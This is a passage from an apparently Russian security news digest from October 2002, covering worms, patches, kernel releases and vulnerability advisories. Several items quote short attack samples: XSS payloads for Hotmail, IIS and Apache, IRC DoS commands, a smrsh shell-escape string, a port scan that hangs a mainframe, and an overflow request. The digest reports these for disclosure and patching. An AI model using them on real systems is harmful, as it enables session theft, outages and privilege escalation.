релизе. Источник - http://www.securityfocus.com
9/10/2002 11:15 Утилита против Tanatos и Opasoft .
В связи с многочисленными случаями заражения сетевыми червями Tanatos и Opasoft по всему миру "Лаборатория Касперского" разработала бесплатную утилиту для обнаружения и удаления данных вредоносных программ. Оба вируса представляют серьезную угрозу для безопасности информации пользователей Интернет. Интернет-червь Opasoft - многокомпонентная вредоносная программа. Сочетает в себе характеристики сетевого червя и "троянца", позволяющего осуществлять несанкционированный удаленный контроль над зараженными компьютерами. Данный сетевой червь распространяется как в пределах одной сети, так и между различными локальными сетями. Интернет-червь Tanatos - многокомпонентная вредоносная программа. Похищает с компьютеров конфиденциальную информацию, распространяясь по электронной почте и локальным сетям. Разработанная "Лабораторией" бесплатная утилита борется с последствиями заражения Tanatos и Opasoft (версии a, b, c, d), обнаруживая и удаляя с зараженной машины эти вредоносные коды. Программа также эффективна против ряда других опасных вредоносных программ, в частности Klez и Sircam. Утилиту можно загрузить здесь - ftp://ftp.kaspersky.ru/utils/clrav.com
9/10/2002 8:40 Обновления пакетов в NetBSD.
Вчера в списке рассылки BUGTRAQ прошла информация об обновлениях многих пакетов в ОС NetBSD. NetBSD Foundation Inc. выпустила Security Advisory с номерами SA-2002-015/019/021/022/023. В них сообщается об обновлении следующих продуктов: libc/libresolv (библиотека, применяемая DNS для разрешения имён в Интернет), talkd, rogue(6), pic(1), sendmail smrsh. Во всех документах настоятельно рекомендуют обновить версию этой ОС до NetBSD-1.6, NetBSD-current. В крайнем случае использовать NetBSD-1.5 c обновлениями версии ОС, вышедшими после выпуска соотв. SA. Обновлённые пакеты указанных программ доступны также с репозитария CVS. Подробности - http://www.NetBSD.ORG/Security/
8/10/2002 18:51 Security Tools в Linux.
Новая статья на linuxjournal.com описывает базовый набор Security Tools в OS Linux. Часть 1 - http://www.linuxjournal.com/article.php?sid=6361&mode=&order=0 Часть 2 - http://www.linuxjournal.com/article.php?sid=6362&mode=&order=0&thold=0
8/10/2002 17:33 Появился эксплоит использующий уязвимость в системе посылки сообщений архитектуры Win32 для повышения привилегий до уровня System.
При старте процесс winlogon создает скрытое окно "NetDDE Agent" для междупроцессного обмена информацией. Так называемая атака Shatter проводится именно с использованием данного окна. Сам эксплоит, его исходник и более подробная информация находится здесь: http://getad.chat.ru/
8/10/2002 16:22 Выход SPIKE 2.7.
Dave Aitel из Immunity, Inc. объявил о выходе новой версии их продукта SPIKE-инструмента, позволяющего конструировать различные типы атак на сервера (авторы его называют как fuzzer creation kit). В новую версию включены следующие эксплоиты: баг ядра в pptp Windows 2000/XP, различные типы DoS в IIS, атаки против MicrosoftRPC и SunRPC (ttdb, cmsd, rpcbind, etc). Также на странице размещена ссылка на обновлённую версию SPIKE Proxy 1.3.2 (мы об этой программе сообщали в рубрике "программа дня"). Страница проекта SPIKE - http://www.immunitysec.com/spike.html
8/10/2002 16:08 XSS-уязвимость Hotmail.
Peter Rdam обнаружил, что со страницы Hotmail, авторизующей пользователя (login page) cуществует возможность проведения атаки типа межсайтовый скриптинг (XSS). Подобная возможность позволяет злоумышленнику заставить посетителя Hotmail при чтении собственной почты выполнить определённый скрипт в контексте hotmail. Таким образом, возникает возможность похищения cookies после авторизации пользователя на сервере, читать пришедшую на его имя почту, отправлять почту от имени пользователя, изменять пароль. Пример URL, формирующего атаку: http://lc2.law5.hotmail.passport.com/cgi-bin/login?_ lang=&id=2&fs=1&cb="><script> alert(document.cookie)</scrip t>&ct=1033054530&_setlang= Источник - http://www.securityfocus.com
8/10/2002 15:33 Linux не сможет уничтожить Microsoft, считает Линус Торвальдс.
Создатель операционной системы Linux Линус Торвальдс дал интервью программе ClickOnline британского телеканала BBC World. В нем он поделился мыслями как о будущем Linux, о противостоянии с Microsoft, а также о собственной жизни. По словам Торвальдса, ему приятно быть знаменитым - это дает ему осознание собственной значимости. Однако он не хотел бы лично ввязываться в споры с Microsoft, поскольку это только помешало бы работе. "Если вы начинаете что-то делать из-за ненависти к кому-то..., конечный результат всегда будет плохим", - сказал Торвальдс. В свое время он взялся за разработку Linux только из-за того, что другие операционные системы не были для него удобными, и он никогда не собирался соперничать с кем-либо. Более того, создатель Linux не считает, что эта операционная система подходит всем. "Многие люди не любят перемен. Они могут ненавидеть Windows, но пользоваться ими, потому что, по большому счету, им нет дела до компьютеров", - считает Торвальдс. По его словам, даже те, кто занимается компьютерами всерьез, часто устанавливают Linux, не особо представляя, зачем им это нужно. Поэтому Linux и программам с открытым исходным кодом не суждено подорвать могущество Microsoft. В лучшем случае, Linux завоюет приличный кусок рынка операционных систем, но доля Windows на нем никогда не упадет до критической отметки. По мнению Торвальдса, в обозримом будущем Microsoft останется очень крупной компанией, хотя ее абсолютной гегемонии на рынке и может настать конец. Подробности - http://www.compulenta.ru/2002/10/7/34500/
8/10/2002 14:38 Статья "Конфигурирование файрволлов в Linux (ядра 2.4). Использование netfilter/iptables".
Опубликована статья Mugdha Vairagade, подробно описывающая процесс конфигурирования и настройки netfilter/iptables - систему филтрации IP-пакетов, встроенную в ядра 2.4 операционной системы Linux. В отличие от своих предшественников (ipfwadm, ipchains) обладает большим количеством настроек, позволяя гибко и максимально безопасно настроить файрволл как на корпоративных сайтах, так и на домашних компьютерах пользователей. Подробности - http://www-106.ibm.com/developerworks/security/...
8/10/2002 14:26 OSNews: Обзор SuSE 8.1 Professional.
На сайте osnews.com опубликована статья Eugenia Loli-Queru, представляющая собой обзор основных возможностей новой версии дистрибутива SuSe. Рассмотрены основные новшества, введённые в новом релизе, рассмотрены плюсы и минусы различных нововведений. В частности, указывается, что в SuSe 8.1 представлен новый оконный менеджер (window manager), однако автор статьи утверждает, что, с точки зрения удобства работы, ей больше понравился представленный RedHat оконный менеджер Bluecurve. Подробнее - http://www.osnews.com/story.php?news_id=1887&page=all
8/10/2002 14:15 Выход Linux 2.5.41.
Вчера Линус Торавальдс объявил о выходе новой версии ядра для разработчиков Linux 2.5.41. Дополнений и исправлений довольно много. Были включены различные дополнения от Алана Кокса, представленные им в версиях -ac (перед этим был выпущен Linux 2.5.40-ac6). Указывается на необходимость применения пакета procps версии 2.0.9 для лучшей статистики работы VM через файловую систему /proc. Полный Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.41
8/10/2002 13:55 Статья "Хакеры - герои или злодеи компьютерных просторов?"
На сайте www.bugtraq.ru Дмитрием Леоновым выложена статья "Хакеры - герои или злодеи компьютерных просторов?", написанная mindw0rk. В статье рассматривается история развития хакерства, как движения, основные его этапы, а также современное состояние этого движения. Статья - http://www.bugtraq.ru/library/misc/hackers.html
8/10/2002 13:29 Уязвимость в Microsoft IIS 5.0
Обнаружена уязвимость в Microsoft Internet Information Server (IIS), позволяющая выполнить атаку типа XSS (межсайтовый скриптинг). При получении запроса к .idc файлу, сервер обычно возвращает 404 ошибку, когда страница не найдена. Однако, когда запрос, содержащий очень длинный URL, заканчивающийся .idc расширением, получен IIS, сервер возвратит страницу ошибки, в которой содержится полное содержание URL без очистки ввода. Уязвимость может привести к выполнению произвольного кода сценария. Пример формирования запроса: http://www.example.com/<long_buffer><script_to_execute>.idc. Источник - http://online.securityfocus.com/bid/5900
7/10/2002 15:50 Конференция в Екатеринбурге.
17-18 октября 2002 года в Екатеринбурге пройдет научно-практическая конференция "Информационная безопасность". В подготовке и проведении конференции принимают участие: ВНИИСтандарт; региональные структуры Гостехкомиссии при президенте РФ, ФАПСИ при президенте РФ, МВД РФ; Институт криптографии, связи и информации (ИКСИ); МИФИ. Информация взята с www.bugtraq.ru Подробная информация - http://www.club.upnet.ru/konferencia1.html
7/10/2002 15:28 Уязвимость в компоненте Windows Help IE/Outlook.
Немного запоздалая новость. Дэвидом Литчфилдом из группы NGSSoftware обнаружена уязвимость в компоненте Windows Help. Эта система помощи включает ActiveX-модуль, известный как HTML Help Control, hhctrl.ocx. В функции "Alink" этого модуля существует уязвимость, позволяющая выполнить переполнение буфера, и, как следствие получить полный контроль над машиной жертвы. Уязвимость обнаружена во всех версиях Windows - Windows XP,2000,NT,ME,98. Атака может быть проведена удалённо-либо при посещении атакуемым соответствующим образом оформленной HTML-страницы Вэб-сервера, либо при попытке открытия посланной HTML-почты в Аутлуке. Microsoft выпустил патч, устраняющий уязвимость. Подробное описание - http://www.ngssoftware.com/advisories/ms-winhlp.txt Патч от Microsoft - http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS02-055.asp
7/10/2002 14:55 Ежемесячный отчёт Netcraft Survey.
Опубликован отчёт за сентябрь 2002 г. компании Netcraft. Каждый месяц проводится анализ программного обеспечения, используемого Вэб-серверами в Интернете. Для этих целей были проанализированы отклики с 35,756,436 сайтов. Согласно полученным данным первые 4 места принадлежат WWW-серверам компаний Apache Fondation (Apache), Microsoft (IIS), Zeus и iPlanet (Netscape-Enterprise). Соответствующие сервера занимают в процентном отношении - 59.91%, 29.18%, 2.08% и 1.36%. Если сравнивать с предыдущим месяцем, количество серверов Apache уменьшилось на 3.6%, Microsoft - увеличилось на 3.79%. Также увеличилось общее количество NT-ориентированных серверов, количество Macintosh-ориентированных серверов составило 0.33 процента. Из общего количества исследованных сайтов 16,801,016, или 46.99% составили сайты домена .com. Подробности - http://www.serverwatch.com/news/article.php/1475371
7/10/2002 10:22 Выход версии 1.5.1 Apache Ant.
Jakarta Ant-Dev объявила о выпуске версии 1.5.1 пакета Apache Ant, предназначенного для создания Java-приложений Вэб-сервера Апач. Обеспечивает полную совместимость с натуральным (pure) Java-кодом. В новой версии устранены многочисленные баги, обнаруженные в предыдущей версии. Подробности - http://jakarta.apache.org/builds/jakarta-ant/release/v1.5.1/
7/10/2002 10:25 Уязвимость в Pirch.
j0k3r из DHGROUP (www.dhgroup.org) обнаружил уязвимость в популярном IRC-клиенте Pirch98. Данная уязвимость может привести к DoS клиента, если в нём включена функция автосохранения приватов. Для этого достаточно изменить свой ник на "aux" (без кавычек) и отправить жертве приват, чтобы клиент завис, так как логи сохраняются в виде nick.txt. Таким образом эксплоит получается следующим:/nick aux; /query victim Привет, что это у тебя за клиент? Жертва либо завершит зависший процесс, либо будет ждать пока он сам завершится. Подробности - http://www.SecurityLab.ru/?ID=33386
7/10/2002 10:10 Cерия ядер 2.5.40 от Алана Кокса.
За прошедшие 3 дня Алан выпустил целую серию своей ветки -ac ядра для разработчиков 2.5.40. Выпущены ac-3,4,5. Полный Changelog - http://linuxtoday.com/news_story.php3?ltsn=2002-10-06-002-26-NW-KN-DV
7/10/2002 09:46 Cтатья "Установка LTSP на бездисковую машину".
На сайте linuxplanet опубликована статья Александра Прохоренко "Setting Up Your Own Diskless Workstations with LTSP". LTSP переводится, как Linux Terminal Server Project и поддерживается на сайте www.ltsp.org. Инсталляция Linux на бездисковых машинах позволяет использовать их в качестве X-терминала. При этом основные вычисления производятся на мощной машине с выводом результатов на Х-сервер, запущенный на Х-терминале (бездисковой машине с не очень быстрым процессором). Основным узким местом такой технологии является сетевое взаимодействие, поэтому оптимальным будет организация 100 МБитной сети. Применение бездисковых машин позволяет фирмам в значительной мере сэкономить деньги при организации внутренней корпоративной сети. В статье автор подробно рассматривает процесс инсталляции и конфигурирования LTSP на бездисковую машину, конфигурирование звука, а также вопросы организации безопасности. Статья доступна - http://www.linuxplanet.com/linuxplanet/tutorials/4472/1/
6/10/2002 12:35 OpenPKG выпущена новая версия Apache.
OpenPKG объявила о выпуске обновлённой версии Апача 1.3.26. В этой версии устранены 3 уязвимости, приводящие в версии до 1.3.26 к отказу в обслуживании (DoS). Подробности - http://www.openpkg.org/security.html
6/10/2002 12:30 Уязвимость в Windows XP.
Makoto Shiotsuki обнаружена уязвимость в WinXP Pro(Gold). Связана она с неправильными полномочиями, выставляемыми системой после выполнения операции восстановления информации (restore information). Слабые разрешения на restore information позволяют просматривать и изменять важные данные, в т.ч. копию SAM. Подробности - http://online.securityfocus.com/bid/5894
6/10/2002 12:20 Red Hat обновил glibc.
Red Hat Inc. объявила о выпуске обновлённой версии пакета библиотек GNU C - glibc, используемого многими программами. Как сообщается, в новой версии (2.1.3-27 для версии 6.2, 2.2.4-18.7.0.7.1 для 7.0, 2.2.4-30 для 7.1/7.2) устранена уязвимость, находящаяся в библиотеке резолвера (DNS). Подробности (RHSA-2002:197-06) - http://www.redhat.com
6/10/2002 11:54 Sun анонсирует выпуск Solaris 9 для x86.
4.10.2002 должен выйти официальный анонс Solaris для x86 платформы (без SMP). Система должна работать не только на родных сановских x86 машинах, но и на компьютерах сторонних производителей. Также, со временем, Sun собирается выпустить весь Sun ONE (Sun Open Network Environment) под Solaris x86. К сожалению, бесплатной версии больше не будет. Цены начинаются от $99. Новость сообщена Botsvein на сайте linux.org.ru Источник - http://www.eweek.com/article2/0,3959,588641,00.asp
5/10/2002 11:49 1% ошибок вызывает половину сбоев в программах Microsoft.
В корпорации Microsoft продолжается кампания по сокращению количества ошибок и недоработок в программном обеспечении. В начале этого года Билл Гейтс в электронном письме сотрудникам объявил, что фокус при разработке ПО должен сместиться с внедрения инноваций в сторону повышения безопасности продуктов. Такую стратегию Гейтс назвал "надежным компьютингом" (Trustworthy Computing). А в начале октября очередное письмо, посвященное проблемам безопасности программных продуктов, разослал сотрудникам Microsoft глава этой компании Стив Баллмер. Он призвал разработчиков более тесно контактировать с пользователями программ Microsoft. По мнению Баллмера, у Microsoft есть три главные цели в краткосрочном периоде. Во-первых, необходимо стараться получать как можно больше отзывов и замечаний от клиентов, во-вторых, необходимо предоставить пользователям более простой и удобный способ обновления программ и исправления содержащихся в них ошибок. Наконец, в-третьих, необходимо обеспечить потребителей программных продуктов Microsoft более эффективной и постоянно доступной технической поддержкой. Баллмер подчеркнул, что в современном программном обеспечении, состоящем из миллионов строк кода, практически невозможно избежать появления ошибок. Однако 80% сбоев в программах, по словам Баллмера, вызваны двадцатью процентами ошибок, а за половину сбоев ответственен всего 1% "багов". Для исправления таких часто проявляющихся ошибок четко налаженная обратная связь просто незаменима. Подробности - http://www.eweek.com/article2/0,3959,583853,00.asp
5/10/2002 11:45 Новая порция уязвимостей в продуктах Microsoft.
Корпорация Microsoft объявила о выпуске очередной порции заплаток к свои программным продуктам. Четыре пакета исправлений позволяют ликвидировать ряд новых дыр, обнаруженных в ОС Windows, СУБД SQL Server и инструментарии Interix SDK, входящем в пакет Microsoft Service for Unix 3.0. Наиболее серьезными являются уязвимости, обнаруженные в системе помощи ОС Windows и описываемые в бюллетене MS02-055. Эти уязвимости имеются во всех версиях Windows, начиная с Windows 98 и Windows NT 4.0. Система помощи в этих ОС построена на базе языка HTML, а за большую часть ее функциональности отвечает специальный модуль ActiveX, который и является уязвимым для атак. Первая уязвимость, по классификации Microsoft, является критической. Одна из функций в модуле ActiveX содержит непроверяемый буфер, вызвав переполнение которого, злоумышленник может захватить контроль над компьютером. Использовать уязвимость можно посредством специальным образом скомпонованной веб-страницы или электронного письма в формате HTML. Атаки по электронной почте не опасны для систем, в которых установлены пакеты Outlook Express 6 или Outlook 2002, либо Outlook 98 или Outlook 2000 с модулем Outlook Email Security Update. Еще одна уязвимость в системе помощи Windows имеет среднюю степень опасности, которая сводится к тому, что в файлах помощи Windows могут размещаться ярлыки для осуществления тех или иных действий с системой. В систему помощи заложены механизмы обеспечения безопасности, позволяющие использовать такие ярлыки только надежным файлам помощи. Более подробно - http://www.compulenta.ru/2002/10/4/34459/
5/10/2002 11:40 Cтатья "Введение в антивирусное сканирование в режиме «при обращении», часть 1".
Сайт securitylab порадовал очередным переводом Михаила Разумова статьи с securityfocus.com. Как видно из названия, статья посвящена принципам работы антивирусного программного обеспечения. Подробно - http://www.securitylab.ru/?ID=33363
4/10/2002 17:40 Nerf Security Group взломали сайт Госдепартамента США.
Содержимое главной страницы сайта www.usinfo.state.gov, на котором содержится информация о США для посетителей из других стран, было изменено на набор нецензурных ругательств на нескольких языках (в том числе, по сообщениям, и на русском-матерном). Как стало известно securitylab, дефейс осуществила Nerf Security Group, и мата никакого небыло. По ссылке приведён вид дефейснутого сайта. Подробности - http://www.securitylab.ru/?ID=33379
4/10/2002 17:23 Возможность выполнения атаки против Unisys "Clearpath".
Как утверждает Jonathan D. Lampe в списке рассылки BUGTRAQ существует возможность "повесить" мейнфрейм Unisys "Clearpath". Для этого достаточно простого сканирования портов NMAP-ом. Судя по всему, этот мейнфрейм открывает буфер на каждйю попытку открытия порта (сканирование). Для проведения атаки достаточно выдать команду "nmap -T Normal". Джонатан известил об атаке Fyodor-а-создателя сканера NMAP. Иcточник - http://www.securityfocus.com
4/10/2002 10:39 Сетевые черви продолжают атаковать Linux
Вслед за сетевым червем Slapper, обнаруженным всего 2 недели назад, на Linux-компьютеры обрушилась очередная эпидемия, вызванная новым Linux-червем под названием Mighty, сообщила "Лаборатория Касперского". На данный момент зарегистрировано более 1600 зараженных систем по всему миру. Многие черты Mighty выдают его сходство с предшественником, сетевым червем Slapper. В частности, он также заражает компьютеры с установленной операционной системой Linux и Web-сервером Apache, а также использует для проникновения брешь в системе безопасности программного пакета OpenSSL. Подробности - http://www.cnews.ru/topnews/2002/10/03/content7.shtml
3/10/2002 18:47 Символ MySQL получил имя.
Дельфин, символ компании MySQL AB (производителя сервера реляционных баз данных MySQL), получил имя - Silaka. Данное имя (пердложенное разработчиком из Свазиленда Ambrose Twebaze) было выбрано путем голосования из 6357 предложенных вариантов. Подробности - http://www.mysql.com/news/article-116.html
3/10/2002 18:15 Вышел Lunar Linux 1.0.
Сегодня вышла первая версия нового Source-based дистрибутива Linux Lunar. Текущий релиз комплектуется новыми версиями ПО, в частности : gcc 3.2, Mozilla 1.1, OpenOffice.org 1.0.1, GNOME 2, KDE 3 и доступен для скачивания тут. Источник - http://developers.slashdot.org/developers/02/10/02/174248.shtml?tid=106
3/10/2002 17:40 XSS-уязвимость в Apache.
Обнаружена XSS(Cross-site scripting)-уязвимость в популярном Вэб-сервере Apache версий 2.0 (до 2.0.43) и 1.3 (до 1.3.26). При отключённой опции UseCanonicalName и поддержке шаблонов (wildcard) DNS удалённый атакующий имеет возможность выполнения скрипта от имени другого посетителя Вэб-страницы сервера, сформировав соответствующий заголовок в HTTP-запросе "Host:". Для выполнения подобного скрипта необходимо сформировать запрос вида (например): Host: <img src="" onerror="alert(document.cookie)">. Уязвимость связана с некооректной обработкой фильтром Апачем HTML-кодов до передачи их броузеру. Происходит это при выдаче сообщения 404 сервером. Apache Software Foundation выпущена новая версия Apache-2.0.43. Полное описание - http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0003.html
3/10/2002 15:25 Выход Linux 2.5.40-ac1.
Алан Кокс, продвигая свою ветку ядер "*-ac" объявил (вслед за Линусом) о выпуске собственной разновидности ядра 2.5.40-ac1. В него были включены патчи: портирован драйвер для aacraid, устранено повреждение виртуальной ф.с. vfat, включена поддержка voyager, пофиксены split_vma, config в поддиректории для работы с видео, документация для IBM touchpad etc. Подробнее - http://linuxtoday.com/news_story.php3...
3/10/2002 15:25 Выпущен комплексный патч для Microsoft SQL-серверу.
2 октября фирма Microsoft объявила в бюллетене MS02-056 о выпуске кумулятивного патча Q316333, закрывающего уязвимости, обнаруженный в SQL-сервере. Затагивает версии: Microsoft SQL Server 7.0, Microsoft Data Engine (MSDE) 1.0, Microsoft SQL Server 2000, Microsoft Desktop Engine (MSDE) 2000. Включает в себя все предыдущие патчи, закрывающие бреши в защите MS SQL, а также недавно обнаруженные уязвимости: возможность перезапуска буфера в секции кода SQL Server 2000 (и MSDE 2000), связанного с аутентификацией пользователей; возможность перезапуска буфера в одной из команд консоли базы данных (DBCCs - Database Console Commands), являющихся частью SQL Server 7.0/2000; уязвимость в планируемых/отложенных (sheduled) задачах вышеназванных серверов, приводящая к возможности запуска команд с привилегиями с полномочиями другого пользователя; возможность выполнения SQL-запроса непривилегированными пользователям выполнять специальные запросы вне SQL OLEDB-запросов. Также в бюллетене подчёркивается, что перекрытие порта 1433 (SQL-сервер) предотвращает атаку снаружи (из Интернет). Подробности - http://www.microsoft.com/technet/security/bulletin/MS02-056.asp
3/10/2002 14:43 Уязвимость в POP3-сервере ОС OpenVMS.
Hewlett Packard и Compaq Computer Corporation выпустили совместный бюллетень по безопасности SSRT2371 (Software Security Response Team), в котором говорится об уязвимости в POP3-сервере, входящем в состав HP TCP/IP services для OpenVMS версий 4.2, 5.0a, 5.1, 5.3. Затронуты обе платформы, для которых выпускается ОС OpenVMS-VAX и ALPHA. Уязвимость локального типа. Заключается в возможности получения доступа к локальному файлу, указав его в качестве лог-файла. При этом, в зависимости от условий, непривилегированный пользователь либо получает доступ к важным системным файлам, либо получает полномочия привилегированного пользователя. HP & Compaq рекомендуют пользователям версий до 5.3 обновиться до версии 5.3, после чего применить патч ECO 1. Бюллетень SSRT2371 доступен - http://thenew.hp.com/country/us/eng/support.html
3/10/2002 14:10 Уязвимости во многих Web-приложениях.
Обнаружены уязвимости в пяти Web-приложениях, написанных на PHP. Среди уязвимых приложений: TightAuction (неавторизованный доступ к внутренним базам данных), PY-Membres (неавторизованный доступ ко всем эккаунтам), upb PB (неавторизованный доступ к внутренней БД пользователей), MidiCart PHP (неавторизованный доступ к внутренним данным - например, к номерам CC (credit_card_info.php), возможность загрузки на сервер (аплоад) внешних данных), Pphlogger (доступ к внутренним данным без авторизации). URL, приведённый автором, содержит информацию на французском языке, поэтому ниже приводится ссылка, в которой для перевода на английский язык задействован внутренний переводчик GOOGLE. Подробности и патчи - http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txt&langpair=fr...
3/10/2002 12:32 Кибервойны приобретают все больший размах.
За прошедший месяц зафиксированы более 9 тысяч успешных хакерских атак. Об этом объявила лондонская компания mi2g, специлизирующаяся в вопросах безопасности компьютерных сетей. Число взломанных веб-сайтов на 54 процента превысило показатели августа 2002 года. В частности, увеличилось количество кибератак на США. В сентябре был нанесён ущерб сайтам Конгресса, Департамента сельского хозяйства, Департамента образования, Службы национальных парков, Центра космических полётов имени Маршалла и прочих государственным ведомств и учреждений. По данным mi2g, всего было повреждено 4157 сайтов, зарегистрированных в США, 835 в Бразилии, 376 в Великобритании, 356 в Германии и 285 в Индии. Хакеры находят всё большее количество уязвимых мест в Сети и часто организовывают атаки на сайты первостепенной важности, вызывая длительный простой самых необходимых сервисов. Хотя большинство нападений были совершены на системы под управлением ПО от Microsoft, существенно выросло количество атак и на серверы под Linux, BSD Unix и Solaris. Общее число сетевых взломов в этом году уже превысило аналогичный показатель прошлого года. Подобная тенденция неумолимого роста количества киберпреступлений наблюдается уже с 1998 года. Источник - http://www.compulenta.ru
3/10/2002 11:25 Уязвимость в smrsh.
iDEFENSE, Inc. объявила о нахождении уязвимости в smrsh (The Sendmail Consortium-s Restricted SShell) - программе, являющейся ограниченным шеллом и предназначеной для выполнения команд MTA sendmail (вместо традиционного шелла Борна sh). Обеспечивает безопасность, позволяя запускать только те внешние команды, которые помещены админом в директорию /etc/smrsh. Тем не менее iDEFENSE была обнаружена возможность обхода этого ограничения. При этом были обнаружены 2 способа. Первый связан с некорректной обработкой команды '||'. В приведённом примере был создан файл в директории /tmp и показана возможность вывода его содержимого. Подобного результата можно достичь, сформировав файл .forward в домашней директории пользователя ($HOME). Второй способ связан с некорректной обработкой символа пробела в поле `command` при запуске конструкции smrsh -c command (например, smrsh -c "/ command" или smrsh -c "././ command"). Для выполнения подобных действий необходимо наличие трёх условий: наличие в системе smrsh (и запуск её в sendmail - либо включение в /etc/sendmail.cf cтроки вызова smrsh как внешнего шелла, либо включением FEATURE(`smrsh') в sendmail.mc), атакующий должен иметь логин в системе (локальный доступ), для метода 1 атакующий должен иметь возможность создания файлов в системе. После выполнения атаки пользователь, не имеющий шелла в системе может получить его (вставкой в .forward команды вызова шелла, например, "| . \|| . /tmp/unauth \|| ."). Уязвимость обнаружена в версиях sendmail 8.12.6 и 8.11.6-15 (включён в дистрибутив Red Hat 7.3). Cтарые версии (например, 8.11 5/19/1998) не подвержены уязвимости. Также нет уязвимости в версии smrsh, доступном с ftp://ftp.uu.net/pub/security/smrsh. Sendmail.org выпущен патч для smrsh. Подробности - http://www.sendmail.org/smrsh.adv.txt
2/10/2002 18:2 Заплатки для Mandrake fetchmail и PostgreSQL.
Компания Mandrake Soft выпустила ряд заплаток для устранения проблем, приводящих к переполнения буфера в fetchmail и PostgreSQL, входящий в стандартный набор ПО дистрибутива. Подробности (fetchmail) - http://www.lwn.net/Articles/11460/ Подробности (PostgreSQL) - http://www.lwn.net/Articles/11461/
2/10/2002 14:23 Вирусная "двадцатка" за сентябрь.
"Лаборатория Касперского" опубликовала двадцатку самых распространённых вирусов, которые поражали компьютеры в сентябре. Согласно их данным, первое место с большим отрывом занимает Klez - 72.93%, на втором - Lentin - 72.93%. Остальные вирусы не набрали и одного процента, так, идущий третьим WIN95.CIH поразил всего 0.27%. Список доступен - http://www.viruslist.com/index.html?tnews=1001&id=1146741
2/10/2002 14:18 Выход Linux 2.5.40.
Линус Торвальдс анонсировал выпуск новой версии ядра для разработчиков 2.0.40. Подробности - http://linuxtoday.com/news_story.php3?ltsn=2002-10-01-010-26-NW-KN-DV
2/10/2002 13:30 Бюллетень по безопасности Bugzilla.
Всем пользователям продукта Bugzilla рекомендуется обновиться до вновь выпущенных версий продукта 2.14.4 и 2.16.1. Об этом сегодня объявлено в бюллетени по безопасности Bugzilla Security Advisory. В этих версиях были устранены 3 уязвимости, которые приведены на сайте проекта Bugzilla (баги с номерами 167485, 163024, 165221). Кроме того, пользователям рекомендуется обновить версию 2.14.3 до версии 2.16.х, поскольку версия 2.14 с конца этого года не будет поддерживаться. Новые версии доступны в виде исходников, патчей к предыдущим версиям и виде репозитария CVS. Источник - http://bugzilla.mozilla.org/
2/10/2002 13:20 Очередная уязвимость в GV.
На этот раз уязвимость связана с возможностью команд оболочки (шелла) с привилегиями пользователя, просматривающего PDF, PS(PostScript)-файлы. Напомним, что GV-это PostScript и PDF превьювер (previewer)., представляющий, с технической точки зрения, интерфейс пользователю к Ghostscript-интерпретатор языков PostScript и PDF. Входит в состав многих UNIX-систем. Обладает способность на лету разархивировать GZIP-файлы. Когда GV определяет тип файла (PDF или GZIP), он выполняет некоторые команды при помощи функции system(). Эти команды могут вместо имени файла, который должен интерпретироваться, получить на входе скрипт, написанный "злонамеренным" пользователем. Автор продукта GV, Johannes Plass, не поддерживает проект с 1997 г., поэтому Marc Bevand, опубликовавший уязвимость, предлагает собственые патчи для программы GV. Подробнее - http://www.epita.fr/~bevand_m/asa/asa-0000
2/10/2002 13:2 По локальным сетям распространяется опасный червь
Разработчики антивирусных систем безопасности сообщили об очередной вирусной эпидемии, которая затронула и российский интернет. Это уже вторая эпидемия на этой неделе. На этот раз ее жертвами могут стать корпоративные пользователи. По данным "Лаборатории Касперского", на этот раз в Рунете появилась многокомпонентная вредоносная программа Opasoft, сочетающая в себе характеристики сетевого червя и "троянца", позволяющего осуществлять несанкционированный удаленный контроль над зараженными компьютерами. На данный момент круглосуточная служба технической поддержки "Лаборатории" получила сообщения о случаях заражения из России, Франции, Германии, Англии, Кореи и ряда других стран, причем количество обращений продолжает расти. Подробности - http://www.cnews.ru/topnews/2002/10/02/content3.shtml
2/10/2002 12:58 Переполнение буфера в WN-сервере.
iDEFENSE, Inc. сообщает об обнаружении возможности переполнения буфера в WN - вэб-сервере, бесплатно распространяемом для многих UNIX-платформ на условиях GPL. Включён в последние коллекции портов для FreeBSD. Переполнение происходит при посылке в запросе GET большого количества символов (в примере авторы использовали 1600 символов "А"). Использование этой уязвимости может привести либо к недоступности WWW-сервиса (DoS), либо к возможности выполнения кода на удалённом сервере. Уязвимость обнаружена в версиях wn-1.18.2 - wn-2.0.0. Автор (John Franks) выпустил новую версию - WN Server 2.4.4. Новая версия WN Server - http://hopf.math.nwu.edu/wn-2.4.4.tar.gz
2/10/2002 12:30 Эксплоит, использующий уязвимость в PPTP-протоколе.
Dave Aitel из Immunity, Inc. выпустил эксплоит, при помощи которого можно свалить сервера и клиенты, использующие PPTP-протокол в ОС WinXP/Win2K (мы сообщали об этой уязвимости ранее в новостях). Эксплоит выпущен в виде SPIKE-скрипта. Правда, для того, чтобы запустить этот скрипт, необходим сам SPIKE-созданный Immunity Inc. инструмент разработчика SPIKE-скриптов (fuzzer creation kit), который применяется для дизассемблирования новых протоколов и тестирования существующих Интернет-протоколов (например, HTTP). Как использовать скрипт написано на приведённом ниже URL в подразделе "9/26/2002: PPTP Vuln here." Там же - исходники SPIKE. Cайт проекта с эксплоитом - http://www.immunitysec.com/spike.html
2/10/2002 10:15 Уязвимость в Winamp 3.
Группой IIL (Illegal Instuctions Lab) обнаружена возможность переполнения буфера в популярном MP3-плеере Winamp 3(1.0.0.488) в ОС WinME. Уязвимость находится в wsabi (Winamp skinning system) - программе разбора скинов. Библиотека, с корой работает wsabi-wsabi.dll. Cформировав большой значение переменной PATH в теге <include file="PATH">, можно вызвать переполнение буфера с возможностью выполнения кода на удалённой машине. Максимальная длина переменной PATH определяется в программе величиной MAX_PATH и равна 512 байт. Автор (Sunnis) приводит пример кода, который может выполняться на удалённой машине в адресном пространстве Winamp. Указывается, что код работает в WinME (4.90), но может быть легко адаптирован для других win32s-платформ. Подробности - http://161.53.51.222/advisory/sunnis-01.txt
2/10/2002 9:55 QT Assistant оставляет открытый порт.
